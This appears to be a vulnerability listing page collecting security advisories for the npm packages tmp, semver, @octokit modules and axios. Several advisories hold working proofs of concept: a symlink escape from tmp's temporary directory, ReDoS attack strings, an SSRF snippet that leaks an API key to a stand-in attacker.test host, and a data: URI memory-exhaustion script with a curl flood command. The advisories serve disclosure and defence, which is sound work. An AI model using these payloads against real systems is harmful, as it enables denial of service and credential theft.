All the vulnerabilities related to the version 0.26.4 of the package
tmp allows arbitrary temporary file / directory write via symbolic link dir
parameter
tmp@0.2.3
is vulnerable to an Arbitrary temporary file / directory write via symbolic link dir
parameter.
According to the documentation there are some conditions that must be held:
// https://github.com/raszi/node-tmp/blob/v0.2.3/README.md?plain=1#L41-L50
Other breaking changes, i.e.
- template must be relative to tmpdir
- name must be relative to tmpdir
- dir option must be relative to tmpdir //<-- this assumption can be bypassed using symlinks
are still in place.
In order to override the system's tmpdir, you will have to use the newly
introduced tmpdir option.
// https://github.com/raszi/node-tmp/blob/v0.2.3/README.md?plain=1#L375
* `dir`: the optional temporary directory that must be relative to the system's default temporary directory.
absolute paths are fine as long as they point to a location under the system's default temporary directory.
Any directories along the so specified path must exist, otherwise a ENOENT error will be thrown upon access,
as tmp will not check the availability of the path, nor will it establish the requested path for you.
Related issue: https://github.com/raszi/node-tmp/issues/207.
The issue occurs because _resolvePath
does not properly handle symbolic link when resolving paths:
// https://github.com/raszi/node-tmp/blob/v0.2.3/lib/tmp.js#L573-L579
function _resolvePath(name, tmpDir) {
if (name.startsWith(tmpDir)) {
return path.resolve(name);
} else {
return path.resolve(path.join(tmpDir, name));
}
}
If the dir
parameter points to a symlink that resolves to a folder outside the tmpDir
, it's possible to bypass the _assertIsRelative
check used in _assertAndSanitizeOptions
:
// https://github.com/raszi/node-tmp/blob/v0.2.3/lib/tmp.js#L590-L609
function _assertIsRelative(name, option, tmpDir) {
if (option === 'name') {
// assert that name is not absolute and does not contain a path
if (path.isAbsolute(name))
throw new Error(`${option} option must not contain an absolute path, found "${name}".`);
// must not fail on valid .<name> or ..<name> or similar such constructs
let basename = path.basename(name);
if (basename === '..' || basename === '.' || basename !== name)
throw new Error(`${option} option must not contain a path, found "${name}".`);
}
else { // if (option === 'dir' || option === 'template') {
// assert that dir or template are relative to tmpDir
if (path.isAbsolute(name) && !name.startsWith(tmpDir)) {
throw new Error(`${option} option must be relative to "${tmpDir}", found "${name}".`);
}
let resolvedPath = _resolvePath(name, tmpDir); //<---
if (!resolvedPath.startsWith(tmpDir))
throw new Error(`${option} option must be relative to "${tmpDir}", found "${resolvedPath}".`);
}
}
The following PoC demonstrates how writing a tmp file on a folder outside the tmpDir
is possible.
Tested on a Linux machine.
tmpDir
that points to a directory outside of itmkdir $HOME/mydir1
ln -s $HOME/mydir1 ${TMPDIR:-/tmp}/evil-dir
ls -lha $HOME/mydir1 | grep "tmp-"
node main.js
File: /tmp/evil-dir/tmp-26821-Vw87SLRaBIlf
test 1: ENOENT: no such file or directory, open '/tmp/mydir1/tmp-[random-id]'
test 2: dir option must be relative to "/tmp", found "/foo".
test 3: dir option must be relative to "/tmp", found "/home/user/mydir1".
$HOME/mydir1
(outside the tmpDir
):ls -lha $HOME/mydir1 | grep "tmp-"
-rw------- 1 user user 0 Apr X XX:XX tmp-[random-id]
main.js
// npm i tmp@0.2.3
const tmp = require('tmp');
const tmpobj = tmp.fileSync({ 'dir': 'evil-dir'});
console.log('File: ', tmpobj.name);
try {
tmp.fileSync({ 'dir': 'mydir1'});
} catch (err) {
console.log('test 1:', err.message)
}
try {
tmp.fileSync({ 'dir': '/foo'});
} catch (err) {
console.log('test 2:', err.message)
}
try {
const fs = require('node:fs');
const resolved = fs.realpathSync('/tmp/evil-dir');
tmp.fileSync({ 'dir': resolved});
} catch (err) {
console.log('test 3:', err.message)
}
A Potential fix could be to call fs.realpathSync
(or similar) that resolves also symbolic links.
function _resolvePath(name, tmpDir) {
let resolvedPath;
if (name.startsWith(tmpDir)) {
resolvedPath = path.resolve(name);
} else {
resolvedPath = path.resolve(path.join(tmpDir, name));
}
return fs.realpathSync(resolvedPath);
}
Arbitrary temporary file / directory write via symlink
semver vulnerable to Regular Expression Denial of Service
Versions of the package semver before 7.5.2 on the 7.x branch, before 6.3.1 on the 6.x branch, and all other versions before 5.7.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range.
@octokit/request has a Regular Expression in fetchWrapper that Leads to ReDoS Vulnerability Due to Catastrophic Backtracking
The regular expression /<([^>]+)>; rel="deprecation"/
used to match the link
header in HTTP responses is vulnerable to a ReDoS (Regular Expression Denial of Service) attack. This vulnerability arises due to the unbounded nature of the regex's matching behavior, which can lead to catastrophic backtracking when processing specially crafted input. An attacker could exploit this flaw by sending a malicious link
header, resulting in excessive CPU usage and potentially causing the server to become unresponsive, impacting service availability.
The vulnerability resides in the regular expression /<([^>]+)>; rel="deprecation"/
, which is used to match the link
header in HTTP responses. This regular expression captures content between angle brackets (<>
) followed by ; rel="deprecation"
. However, the pattern is vulnerable to ReDoS (Regular Expression Denial of Service) attacks due to its susceptibility to catastrophic backtracking when processing malicious input.
An attacker can exploit this vulnerability by sending a specially crafted link
header designed to trigger excessive backtracking. For example, the following headers:
fakeHeaders.set("link", "<".repeat(100000) + ">");
fakeHeaders.set("deprecation", "true");
The crafted link
header consists of 100,000 consecutive <
characters followed by a closing >
. This input forces the regular expression engine to backtrack extensively in an attempt to match the pattern. As a result, the server can experience a significant increase in CPU usage, which may lead to denial of service, making the server unresponsive or even causing it to crash under load.
The issue is present in the following code:
const matches = responseHeaders.link && responseHeaders.link.match(/<([^>]+)>; rel="deprecation"/);
In this scenario, the link
header value triggers the regex to perform excessive backtracking, resulting in resource exhaustion and potentially causing the service to become unavailable.
import { request } from "@octokit/request";
const originalFetch = globalThis.fetch;
globalThis.fetch = async (url, options) => {
const response = await originalFetch(url, options);
const fakeHeaders = new Headers(response.headers);
fakeHeaders.set("link", "<".repeat(100000) + ">");
fakeHeaders.set("deprecation", "true");
return new Response(response.body, {
status: response.status,
statusText: response.statusText,
headers: fakeHeaders
});
};
request("GET /repos/octocat/hello-world")
.then(response => {
// console.log("[+] Response received:", response);
})
.catch(error => {
// console.error("[-] Error:", error);
});
// globalThis.fetch = originalFetch;
This is a Denial of Service (DoS) vulnerability caused by a ReDoS (Regular Expression Denial of Service) flaw. The vulnerability allows an attacker to craft a malicious link
header that exploits the inefficient backtracking behavior of the regular expression used in the code.
The primary impact is the potential for server resource exhaustion, specifically high CPU usage, which can cause the server to become unresponsive or even crash when processing the malicious request. This affects the availability of the service, leading to downtime or degraded performance.
The vulnerability impacts any system that uses this specific regular expression to process link
headers in HTTP responses. This can include:
link
header, making it a low-barrier attack that could be exploited by anyone.@octokit/request-error has a Regular Expression in index that Leads to ReDoS Vulnerability Due to Catastrophic Backtracking
A Regular Expression Denial of Service (ReDoS) vulnerability exists in the processing of HTTP request headers. By sending an authorization header containing an excessively long sequence of spaces followed by a newline and "@", an attacker can exploit inefficient regular expression processing, leading to excessive resource consumption. This can significantly degrade server performance or cause a denial-of-service (DoS) condition, impacting availability.
The issue occurs at line 52 of iterator.ts in the @octokit/request-error repository.
The vulnerability is caused by the use of an inefficient regular expression in the handling of the authorization
header within the request processing logic:
authorization: options.request.headers.authorization.replace(
/ .*$/,
" [REDACTED]"
)
The regular expression / .*$/
matches a space followed by any number of characters until the end of the line. This pattern is vulnerable to Regular Expression Denial of Service (ReDoS) when processing specially crafted input. Specifically, an attacker can send an authorization
header containing a long sequence of spaces followed by a newline and "@", such as:
headers: {
authorization: "" + " ".repeat(100000) + "\n@",
}
Due to the way JavaScript's regular expression engine backtracks while attempting to match the space followed by arbitrary characters, this input can cause excessive CPU usage, significantly slowing down or even freezing the server. This leads to a denial-of-service condition, impacting availability.
import { RequestError } from "@octokit/request-error";
const error = new RequestError("Oops", 500, {
request: {
method: "POST",
url: "https://api.github.com/foo",
body: {
bar: "baz",
},
headers: {
authorization: ""+" ".repeat(100000)+"\n@",
},
},
response: {
status: 500,
url: "https://api.github.com/foo",
headers: {
"x-github-request-id": "1:2:3:4",
},
data: {
foo: "bar",
},
},
});
This is a Regular Expression Denial of Service (ReDoS) vulnerability
, which occurs due to an inefficient regular expression (/ .*$/
) used to sanitize the authorization
header. An attacker can craft a malicious input that triggers excessive backtracking in the regex engine, leading to high CPU consumption and potential denial-of-service (DoS).
authorization
headers are at risk, especially those processing a large volume of authentication requests.@octokit/plugin-paginate-rest has a Regular Expression in iterator Leads to ReDoS Vulnerability Due to Catastrophic Backtracking
For the npm package @octokit/plugin-paginate-rest
, when calling octokit.paginate.iterator()
, a specially crafted octokit
instance—particularly with a malicious link
parameter in the headers
section of the request
—can trigger a ReDoS attack.
The issue occurs at line 39 of iterator.ts in the @octokit/plugin-paginate-rest repository. The relevant code is as follows:
url = ((normalizedResponse.headers.link || "").match(
/<([^>]+)>;\s*rel="next"/,
) || [])[1];
The regular expression /<([^>]+)>;\s*rel="next"/
may lead to a potential backtracking vulnerability, resulting in a ReDoS (Regular Expression Denial of Service) attack. This could cause high CPU utilization and even service slowdowns or freezes when processing specially crafted Link
headers.
import { Octokit } from "@octokit/core";
import { paginateRest } from "@octokit/plugin-paginate-rest";
const MyOctokit = Octokit.plugin(paginateRest);
const octokit = new MyOctokit({
auth: "your-github-token",
});
// Intercept the request to inject a malicious 'link' header for ReDoS
octokit.hook.wrap("request", async (request, options) => {
const maliciousLinkHeader = "" + "<".repeat(100000) + ">"; // attack string
return {
data: [],
headers: {
link: maliciousLinkHeader, // Inject malicious 'link' header
},
};
});
// Trigger the ReDoS attack by paginating through GitHub issues
(async () => {
try {
for await (const normalizedResponse of octokit.paginate.iterator(
"GET /repos/{owner}/{repo}/issues", { owner: "DayShift", repo: "ReDos", per_page: 100 }
)) {
console.log({ normalizedResponse });
}
} catch (error) {
console.error("Error encountered:", error);
}
})();
This is a Regular Expression Denial of Service (ReDoS) vulnerability, which occurs due to excessive backtracking in the regex pattern:
/<([^>]+)>;\s*rel="next"/
When processing a specially crafted Link
header, this regex can cause significant performance degradation, leading to high CPU utilization and potential service unresponsiveness.
@octokit/plugin-paginate-rest
who call octokit.paginate.iterator()
and process untrusted or manipulated Link
headers.Axios Cross-Site Request Forgery Vulnerability
An issue discovered in Axios 0.8.1 through 1.5.1 inadvertently reveals the confidential XSRF-TOKEN stored in cookies by including it in the HTTP header X-XSRF-TOKEN for every request made to any host allowing attackers to view sensitive information.
axios Requests Vulnerable To Possible SSRF and Credential Leakage via Absolute URL
A previously reported issue in axios demonstrated that using protocol-relative URLs could lead to SSRF (Server-Side Request Forgery). Reference: axios/axios#6463
A similar problem that occurs when passing absolute URLs rather than protocol-relative URLs to axios has been identified. Even if baseURL
is set, axios sends the request to the specified absolute URL, potentially causing SSRF and credential leakage. This issue impacts both server-side and client-side usage of axios.
Consider the following code snippet:
import axios from "axios";
const internalAPIClient = axios.create({
baseURL: "http://example.test/api/v1/users/",
headers: {
"X-API-KEY": "1234567890",
},
});
// const userId = "123";
const userId = "http://attacker.test/";
await internalAPIClient.get(userId); // SSRF
In this example, the request is sent to http://attacker.test/
instead of the baseURL
. As a result, the domain owner of attacker.test
would receive the X-API-KEY
included in the request headers.
It is recommended that:
baseURL
is set, passing an absolute URL such as http://attacker.test/
to get()
should not ignore baseURL
.baseURL
with the user-provided parameter), axios should verify that the resulting URL still begins with the expected baseURL
.Follow the steps below to reproduce the issue:
mkdir /tmp/server1 /tmp/server2
echo "this is server1" > /tmp/server1/index.html
echo "this is server2" > /tmp/server2/index.html
python -m http.server -d /tmp/server1 10001 &
python -m http.server -d /tmp/server2 10002 &
import axios from "axios";
const client = axios.create({ baseURL: "http://localhost:10001/" });
const response = await client.get("http://localhost:10002/");
console.log(response.data);
$ node main.js
this is server2
Even though baseURL
is set to http://localhost:10001/
, axios sends the request to http://localhost:10002/
.
baseURL
and does not validate path parameters is affected by this issue.Axios is vulnerable to DoS attack through lack of data size check
When Axios runs on Node.js and is given a URL with the data:
scheme, it does not perform HTTP. Instead, its Node http adapter decodes the entire payload into memory (Buffer
/Blob
) and returns a synthetic 200 response.
This path ignores maxContentLength
/ maxBodyLength
(which only protect HTTP responses), so an attacker can supply a very large data:
URI and cause the process to allocate unbounded memory and crash (DoS), even if the caller requested responseType: 'stream'
.
The Node adapter (lib/adapters/http.js
) supports the data:
scheme. When axios
encounters a request whose URL starts with data:
, it does not perform an HTTP request. Instead, it calls fromDataURI()
to decode the Base64 payload into a Buffer or Blob.
Relevant code from [httpAdapter](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L231)
:
const fullPath = buildFullPath(config.baseURL, config.url, config.allowAbsoluteUrls);
const parsed = new URL(fullPath, platform.hasBrowserEnv ? platform.origin : undefined);
const protocol = parsed.protocol || supportedProtocols[0];
if (protocol === 'data:') {
let convertedData;
if (method !== 'GET') {
return settle(resolve, reject, { status: 405, ... });
}
convertedData = fromDataURI(config.url, responseType === 'blob', {
Blob: config.env && config.env.Blob
});
return settle(resolve, reject, { data: convertedData, status: 200, ... });
}
The decoder is in [lib/helpers/fromDataURI.js](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/helpers/fromDataURI.js#L27)
:
export default function fromDataURI(uri, asBlob, options) {
...
if (protocol === 'data') {
uri = protocol.length ? uri.slice(protocol.length + 1) : uri;
const match = DATA_URL_PATTERN.exec(uri);
...
const body = match[3];
const buffer = Buffer.from(decodeURIComponent(body), isBase64 ? 'base64' : 'utf8');
if (asBlob) { return new _Blob([buffer], {type: mime}); }
return buffer;
}
throw new AxiosError('Unsupported protocol ' + protocol, ...);
}
config.maxContentLength
or config.maxBodyLength
, which only apply to HTTP streams.data:
URI of arbitrary size can cause the Node process to allocate the entire content into memory.In comparison, normal HTTP responses are monitored for size, the HTTP adapter accumulates the response into a buffer and will reject when totalResponseBytes
exceeds [maxContentLength](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L550)
. No such check occurs for data:
URIs.
const axios = require('axios');
async function main() {
// this example decodes ~120 MB
const base64Size = 160_000_000; // 120 MB after decoding
const base64 = 'A'.repeat(base64Size);
const uri = 'data:application/octet-stream;base64,' + base64;
console.log('Generating URI with base64 length:', base64.length);
const response = await axios.get(uri, {
responseType: 'arraybuffer'
});
console.log('Received bytes:', response.data.length);
}
main().catch(err => {
console.error('Error:', err.message);
});
Run with limited heap to force a crash:
node --max-old-space-size=100 poc.js
Since Node heap is capped at 100 MB, the process terminates with an out-of-memory error:
<--- Last few GCs --->
…
FATAL ERROR: Reached heap limit Allocation failed - JavaScript heap out of memory
1: 0x… node::Abort() …
…
Mini Real App PoC:
A small link-preview service that uses axios streaming, keep-alive agents, timeouts, and a JSON body. It allows data: URLs which axios fully ignore maxContentLength
, maxBodyLength
and decodes into memory on Node before streaming enabling DoS.
import express from "express";
import morgan from "morgan";
import axios from "axios";
import http from "node:http";
import https from "node:https";
import { PassThrough } from "node:stream";
const keepAlive = true;
const httpAgent = new http.Agent({ keepAlive, maxSockets: 100 });
const httpsAgent = new https.Agent({ keepAlive, maxSockets: 100 });
const axiosClient = axios.create({
timeout: 10000,
maxRedirects: 5,
httpAgent, httpsAgent,
headers: { "User-Agent": "axios-poc-link-preview/0.1 (+node)" },
validateStatus: c => c >= 200 && c < 400
});
const app = express();
const PORT = Number(process.env.PORT || 8081);
const BODY_LIMIT = process.env.MAX_CLIENT_BODY || "50mb";
app.use(express.json({ limit: BODY_LIMIT }));
app.use(morgan("combined"));
app.get("/healthz", (req,res)=>res.send("ok"));
/**
* POST /preview { "url": "<http|https|data URL>" }
* Uses axios streaming but if url is data:, axios fully decodes into memory first (DoS vector).
*/
app.post("/preview", async (req, res) => {
const url = req.body?.url;
if (!url) return res.status(400).json({ error: "missing url" });
let u;
try { u = new URL(String(url)); } catch { return res.status(400).json({ error: "invalid url" }); }
// Developer allows using data:// in the allowlist
const allowed = new Set(["http:", "https:", "data:"]);
if (!allowed.has(u.protocol)) return res.status(400).json({ error: "unsupported scheme" });
const controller = new AbortController();
const onClose = () => controller.abort();
res.on("close", onClose);
const before = process.memoryUsage().heapUsed;
try {
const r = await axiosClient.get(u.toString(), {
responseType: "stream",
maxContentLength: 8 * 1024, // Axios will ignore this for data:
maxBodyLength: 8 * 1024, // Axios will ignore this for data:
signal: controller.signal
});
// stream only the first 64KB back
const cap = 64 * 1024;
let sent = 0;
const limiter = new PassThrough();
r.data.on("data", (chunk) => {
if (sent + chunk.length > cap) { limiter.end(); r.data.destroy(); }
else { sent += chunk.length; limiter.write(chunk); }
});
r.data.on("end", () => limiter.end());
r.data.on("error", (e) => limiter.destroy(e));
const after = process.memoryUsage().heapUsed;
res.set("x-heap-increase-mb", ((after - before)/1024/1024).toFixed(2));
limiter.pipe(res);
} catch (err) {
const after = process.memoryUsage().heapUsed;
res.set("x-heap-increase-mb", ((after - before)/1024/1024).toFixed(2));
res.status(502).json({ error: String(err?.message || err) });
} finally {
res.off("close", onClose);
}
});
app.listen(PORT, () => {
console.log(`axios-poc-link-preview listening on http://0.0.0.0:${PORT}`);
console.log(`Heap cap via NODE_OPTIONS, JSON limit via MAX_CLIENT_BODY (default ${BODY_LIMIT}).`);
});
Run this app and send 3 post requests:
SIZE_MB=35 node -e 'const n=+process.env.SIZE_MB*1024*1024; const b=Buffer.alloc(n,65).toString("base64"); process.stdout.write(JSON.stringify({url:"data:application/octet-stream;base64,"+b}))' \
| tee payload.json >/dev/null
seq 1 3 | xargs -P3 -I{} curl -sS -X POST "$URL" -H 'Content-Type: application/json' --data-binary @payload.json -o /dev/null```
Enforce size limits
For protocol === 'data:'
, inspect the length of the Base64 payload before decoding. If config.maxContentLength
or config.maxBodyLength
is set, reject URIs whose payload exceeds the limit.
Stream decoding
Instead of decoding the entire payload in one Buffer.from
call, decode the Base64 string in chunks using a streaming Base64 decoder. This would allow the application to process the data incrementally and abort if it grows too large.